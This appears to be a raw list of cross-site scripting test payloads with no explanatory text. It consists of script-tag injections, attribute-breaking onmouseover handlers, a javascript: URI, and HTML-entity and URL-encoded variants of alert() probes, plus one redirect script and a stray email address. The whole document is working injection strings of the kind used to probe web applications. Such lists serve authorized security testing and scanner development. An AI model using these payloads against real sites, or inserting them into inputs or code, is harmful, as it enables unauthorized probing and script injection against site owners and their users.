\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'

FRC'"()&%<><ScRiPt >alert(document.domain)</ScRiPt>

2016/05/13'%22()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>

the%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E

180152668%22%20onmouseover%3dalert(document.domain)%20bad%3d%22

xyvaisyp'%22()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>

sample%2540email.tst'%22()%26%25<acx><ScRiPt%20>alert(document.domain)</ScRiPt>

en%22%20onmouseover%3dalert(document.domain)%20bad%3d%22

<script>
function newLocation() {window.location="http://www.w3.org";
}
</script>

"></*  *\script>

javascript:alert('XSS')

"><script>alert(1)</script>


"><script>alert(1)</script>

&#34&#62script&#60alert(1)&#62&#47script&#60


&#34&#62script&#60alert&#40XSS&#41&#62&#47script&#60

&#34<script&#60alert(1)<&#47script&#60



%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
natukupuw@hurify1.com
